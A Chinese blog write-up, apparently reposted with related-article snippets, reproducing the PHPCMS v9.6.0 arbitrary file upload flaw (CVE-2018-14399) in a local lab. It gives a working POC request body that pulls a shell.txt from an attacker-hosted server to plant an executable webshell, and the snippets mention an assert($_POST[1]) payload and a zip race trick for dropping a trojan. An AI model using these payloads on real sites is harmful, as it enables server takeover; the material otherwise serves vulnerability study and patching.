phpcms attachment.class.php路径,2019-11-9:phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)

最新推荐文章于 2023-01-21 22:35:36 发布
最新推荐文章于 2023-01-21 22:35:36 发布
阅读量257 收藏 3
点赞数
文章标签: phpcms attachment.class.php路径

一,下载安装phpcmsv966.0

1,下载官方下载phpcms v9.6.0版本,下载地址: http://download.phpcms.cn/v9/9.6/下载之后,将源码都解压到phpstudy的www目录,浏览器访问源码中的install目录,一步步安装

16089a64f0387a5a3d36e7826a060352.png

2,打开后台管理,进入后台,后台账号密码为之前安装时候设置的账号密码

e79f380fd73b5a67d772f2e3e3946360.png

a9bee4e60943f74719a9ef49f82831a7.png

二、漏洞复现

1,查询资料可知,任意文件上传漏洞出现在,PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意的PHP代码。

2,漏洞利用,在phpcms注册界面,填写信息进行抓包

3fa934f53e591f8c7c446c02661cba7c.png

3、在另一个系统(kali),开启web服务,然后在web根目录下创建一个txt文件,写入如下信息

vim shell.txt

7a32472091772dabac5e01ca043646e3.png

4. 构造POC

siteid=1&modelid=11&username=test2&password=test2123&email=test2@163.com&info[content]=shell.txt?.php#.jpg&dosubmit=1&protocol=

65305febd4074de7443b1bb57a0ffd26.png

5,访问得到的上传路径,可以看到脚本正常执行

7e0d824c2744dbad94814f952a42edc8.png

64840b38ecfae5c7395cd176886d3b16.png

标签:11,文件,漏洞,v9.6,phpcms,后台,上传,下载

来源: https://www.cnblogs.com/sym945/p/11825504.html

佐伊23
关注
phpcms v9.任意文件上传漏洞复现
newlife1441的博客
08-15 4638
如果你也出现上面的情况请试试下面说的方法:这里有一个小坑注意,你在压缩前面的文件时要注意他们在压缩文件中的顺序,意思就是你创建的一个php文件在创建的txt文件的上面就可以成功,只有这样在解压失败后它还是能够保留并将php文件成功解压出来。时间竞争漏洞利用原理其实就是在解压文件后与删除限制的文件之间的时间空隙来利用提前在限制的文件中写好的利用代码在非解压目录下生成新的不会被删除的新文件(木马),通过这个木马来拿下网站。原理:这里我们通过利用解压文件在解压过程出错会导致后面的递归删除操作不会执行的特点。...
phpcms v9.6.0任意文件上传漏洞复现与原理分析(CVE-2018-14399)
不想当脚本小子的脚本小子
12-26 2936
一、漏洞描述 PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意PHP代码。 二、漏洞影响版本 PHPCMS 9.6.0 三、漏洞环境搭建 1.解压下载的文件,然后把文件放到phpstudy的网站根目录下,浏览器访问127.0.0.1/phpcms/install/install.php,开始安装 在创..
attachment.class.php,php写的发送附件的程序(二)-PHP教程,邮件处理
weixin_39612057的博客
03-18 93
class html_mime_mail{var $headers;var $body;var $multipart;var $mime;var $html;var $html_text;var $html_images = array();var $cids = array();var $do_html;var $parts = array();/************************...
phpcms attachment.class.php路径,PHPCMS 使用心得与技巧,以及小BUG的纠正
weixin_42502537的博客
04-08 115
PHPCMS开发的第一个项目是一个素材类网站 www.penshow.cn,之所以选PHPCMS估计是因为看了她的百万级的数据测试报告。而之后,我越用感觉也越不错。当然,期间遇到过不少问题,总结了一下,方便以后开发。(版本:phpcms2008sp3_gbk)综合问题使用GET标签时静态分页出错以及分页地址会链接到后台文件:/include/global.func.php函数:pages在 if...
php 目录结构,php的目录结构
weixin_42355272的博客
03-10 464
phpcms v9框架的目录结构分析phpcms v9框架的目录结构分析:了解v9框架的目录结构,有助于帮助我们快速建立起对v9框架的一个整体认识打开"mycms"项目,有如下文件和目录使用协议说明文档、英文版的用户手册,这两项不是项目所必须的,可暂时将其删除|-----api 接口文件目录|-----caches 缓存文件目录|-----configs 系统配置文件目录|-----databa...
attachment.class.php,phpcmsattachment.class.php中getshell漏洞修复方法
weixin_36251052的博客
03-10 103
phpcmsattachment.class.php中getshell漏洞修复方法;1. 打开/phpcms/libs/classes/中的attachment.class.php文件,找到以下代码;// 修改之前function download($field, $value,$watermark = '0',$ext = 'gif|jpg|jpeg|bmp|png', $absurl = '...
反序列化复现CVE-2016-7124 AND phpcms v9.6.0任意文件上传漏洞 CVE-2018-14399
qq_43400414的博客
12-03 551
反序列化复现CVE-2016-7124 这里以一道CTF题目为例子 可以看见在sercet类中所存在的三个方法都是魔法函数,具体含义已在注释中写明 可以看出来我们需要传入一个变量为val,然后通过destructd函数输出得到我们flag.php,但是由于存在wakeup函数,导致我们反序列化后的$file始终为index.php,所以我们就需要绕过wakeup函数,使他不执行。 我们先看一看正常情况下,这段代码输出的序列化对象。 O:6:"sercet":1:{s:12:"s..
phpcms-2008-CVE-2018-19127
03-18
phpcms-2008-CVE-2018-19127 最近,我们在phpcms 2008源代码的/type.php中发现了一个漏洞。当攻击者发送诸如“ /type.php?template=tag _(){}; @ unlink( FILE ); assert($ _ POST [1]); {//../ rss”之类的...
phpcmsv9.0任意文件上传漏洞解析
01-19
POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Fire...
PHPcms源码CMS程序JTBC网站内容管理系统 v1.0.0.5(PHP)-jtbccms-php
最新发布
02-15
PHPcms源码[CMS程序]JTBC网站内容管理系统 v1.0.0.5(PHP)_jtbccms_php
PHPCMS v9.6.0 GBK
10-23
PHPCMS V9采用PHP5+MYSQL做为技术基础进行开发。PHPCMS V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的二次开发能力,可满足所有网站的应用需求。PHPCMS V9在保留2008版的特点的同时,对新版本作出重大的创新,为此我们做出了巨大的努力,希望能为更多的站长提供优质的建站系统!PHPCMS V9目前已提供文章、图片、下载等内容模型,在此基础上可非常方便的扩展出信息、房产、交友、点评等功能。已有的模块有:会员、在线充值、全站搜索、评论、专题、新闻心情、短消息、投票、友情链接、公告、附件管理、数据源模块、广告、采集、表单向导、手机门户等模块。 版本v9.6.0 功能变更及bug修正说明: 适配php5.5 php5.6 php7安装改成使用mysqli模块,不在使用mysql模块,默认使用mysqli模块。升级用户不受影响string2array函数改成json处理,为了保持兼容函数名称没做变动后台模块管理菜单调整发表文章界面关联菜单弹出层宽度调整mysqli类bug修复发表文章标题颜色清除无效的
phpcms attachment.class.php路径,解决phpcms上传不了图片的方法
weixin_29453497的博客
04-08 188
解决phpcms上传不了图片的方法发布时间:2020-08-11 14:46:54来源:亿速云阅读:97作者:小新这篇文章给大家分享的是有关解决phpcms上传不了图片的方法的内容。小编觉得挺实用的,因此分享给大家做个参考。一起跟随小编过来看看吧。phpcms上传不了图片怎么办?PHPCMS V9 在最近一次更新的版本(9.4.2)中由于代码判断失误。导致PHPCMS在后台更新文章无法上传图片而导...
phpcms attachment.class.php路径,解决PhpCms V9后台无法上传图片
weixin_33810114的博客
04-08 202
PHPCMS V9 在最近一次更新的版本(9.4.2)中由于代码判断失误。导致PHPCMS在后台更新文章无法上传图片而导致的bug。新一也在PHPCMS论坛中找到了临时解决方案,希望PHPCMS官方能尽快发布更新包,让更多的运营站长们省事省力。 遇到上图提示的同学们现在有福了!PHPCMS V9 在最近一次更新的版本(9.4.2)中由于代码判断失误。导致PHPCMS在后台更新文章无法上传图片而导致...
phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)
AgonYAN的博客
07-25 3121
phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)
phpcms attachment.class.php,phpcms9.6.0任意文件上传漏洞CVE-2018-14399
weixin_42533243的博客
03-22 357
0x00:前言PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意PHP代码。可以直接前台getshell。phpcms 9.6.00x01:漏洞测试1.1 浏览器访问前台注册会员1.2 点击注册按钮,用burp抓包发送到...
mysql文件上传漏洞_phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)
weixin_39887926的博客
02-28 221
phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)一、漏洞描述PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意PHP代码。二、漏洞影响版本PHPCMS 9.6.0三、漏洞环境搭建2、 解压下载的...
phpcms system.php,phpcms_v9.6.0_UTF8 PHPcms系统开源 很有用 - 下载 - 搜珍网
weixin_33724434的博客
03-12 396
readme/readme/.htaccessreadme/PHPCMS_V9安装说明.urlreadme/PHPCMS_V9帮助文档.urlinstall_package/install_package/admin.phpinstall_package/api/install_package/api/add_favorite.phpinstall_package/api/checkcode.ph...
Phpcms V9.6.0任意文件写入getshell
主题模板站的博客
01-21 619
PHPcms v9.6的任意文件上传漏洞,已经潜伏半年多的一个漏洞。该漏洞可以在用户注册界面以未授权的情况下实现任意文件上传phpcms v9.6正常部署phpcms v9.6就好。复现过程中,可以在用户注册页面通过POST提交:在src后面跟上自己shell的url。注意是要.txt格式写的shell。网上已经有逆向分析的过程,这次我来正向的分析一下这个洞。首先看到用户注册的模块,位于phpcms/modules/member/index.php的register方法中。代码很多,一点点往下看:完成了
phpcms v9.6.0版本getshell测试
黑面狐
09-09 4888
其实这个漏洞是4月初的时候了。 今天有空重新记录一下。 一、环境搭建: 需要 phpcms V9.6.0安装包/ phpstudy 安装PHPstudy完成后,直接把phpcms V9.6.0解压到WWW目录下 然后浏览器访问:http://ip/phpcms 进行安装,安装都是傻瓜式的操作,填写好数据库用户名密码就可以了。。phpstudy的mysql数据库root密码默认为root
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值